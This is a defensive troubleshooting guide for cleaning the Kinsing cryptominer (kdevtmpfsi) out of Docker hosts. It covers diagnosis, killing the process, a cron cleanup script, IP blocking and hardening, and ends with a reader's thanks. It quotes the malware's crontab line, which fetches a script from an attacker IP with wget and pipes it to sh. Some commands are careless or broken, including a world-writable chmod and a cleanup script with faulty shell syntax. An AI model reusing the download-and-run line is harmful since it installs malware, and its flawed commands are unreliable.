Full Background: https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability
Content:
- Start
- A Diagnose infection
- Immediate Actions
- B Stop the process and prevent restart
- C Gain time by blocking the script by cron
- D check for a crontab entry which downloads the miner
- E Rename wget and curl (as a last resort)
- F Check ssh key auth to other servers
- Prevent new invections
- try to find the entrypoint (logs)
- run docker rootless
$ topIf you see either a prozess called kdevtmpfsi or kinsing further an exhausted CPU you're infected
$ sudo systemctl status $(pidof kdevtmpfsi)Should show you the file in dockers overlay filesystem. For example:
sudo rm /var/lib/docker/overlay2/19fc6f1ba58751286e1a718e58503f7232e44359cc8a58befc0d683c13740e4c/diff/tmp/kdevtmpfsi
Another way is $ sudo find / -iname 'kdevtmpfsi
$ sudo docker ps -qa | xargs -I{} bash -c "docker inspect {} | grep <hash> && echo {}"See time Col in $ top and calculate today minus minutes of value.
$ sudo service docker stop
$ sudo kill -9 $(pidof kdevtmpfsi)
$ sudo kill -9 $(pidof kinsing)
$ rm -f /tmp/kdevtmpfsi ; echo "ALL_GOOD_HERE" > /tmp/kdevtmpfsi
$ rm -f /var/tmp/kinsing ; echo "ALL_GOOD_HERE" > /var/tmp/kinsing
$ rm -f /tmp/zzz ; echo "ALL_GOOD_HERE" > /tmp/zzz
$ rm -f /tmp/zzz.sh ; echo "ALL_GOOD_HERE" > /tmp/zzz.sh
$ sudo chmod -R go-x /tmp
$ sudo chmod -R 0777 /tmp/
$ sudo chmod -R go-x /var/tmp
$ sudo chmod -R 0777 /var/tmp/Create an executable shell script ~/remove_miner.sh
#!/bin/sh
NOW=`date +%Y-%m-%d-%T`
for x in $(ps -ef | egrep 'kdevtmpfsi|kinsing' | grep -v 'grep' | awk '{print $2":"$8}')
do
PID=echo ${x}|cut -d: -f1
PROC=echo ${x}|cut -d: -f2
sudo kill -9 ${PID}
if [[ -f /tmp/${PROC} ]]; then
echo "[${NOW}][WARN] Found: /tmp/${PROC}"
sudo rm -rf /tmp/${PROC}
fi
if [[ -f /var/tmp/${PROC} ]]; then
echo "[${NOW}][WARN] Found: /var/tmp/${PROC}"
sudo rm -rf /var/tmp/${PROC}
fi
done
echo "[${NOW}] Executed"Execute it every minute by use of cron:
$ crontab -e
* * * * * ~/remove_miner.shfor user in $(cut -f1 -d: /etc/passwd); do echo $user; sudo crontab -u $user -l; done
If you find something like * * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1 delete it
For example with UFW/IPTABLES
142.44.191.122
185.92.74.42
217.12.221.24
217.12.221.244
45.10.88.102
91.215.169.111
193.33.87.219
45.10.88.124
178.157.91.26
45.137.151.106
139.99.50.255
193.33.87.220
195.123.220.193
As a last resort delete the miner as described and rename
$ which curl
$ which wgetWhich should prevent the miner from beeing downloaded again.
As the miner tries to gather login information, check which ssh connection can be found and change the keys
To be done for all users:
$ cat ~/.ssh- Check if a unsecured Redis Container is running
- Check if an outdated Apache Solr is running
- Check for outdated PHP Modules
- Check if Docker API Port is unsecured open. On the VM
$ systemctl status docker
● docker.service - Docker Application Container Engine
Loaded: loaded (/lib/systemd/system/docker.service; enabled; vendor preset: enabled)
Active: active (running) since Di 2020-12-22 17:41:45 CET; 16h ago
Docs: https://docs.docker.com
Main PID: 894 (dockerd)
Tasks: 68
Memory: 2.8G
CPU: 9min 51.198s
CGroup: /system.slice/docker.service
├─ 894 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
├─1392 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 443 -container-port 443
├─1456 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 80 -container-port 80If it's open you will see port 2375 or 2376
/usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock --some-flag-or-option:2375- scan server with nmap and vulners https://null-byte.wonderhowto.com/how-to/easily-detect-cves-with-nmap-scripts-0181925/
- run docker rootless: https://docs.docker.com/engine/security/rootless/
Thanks alot. This really helped me get rid of the miner. I will monitor for any other suspicious activities. Otherwise my services - especially postgres were being affected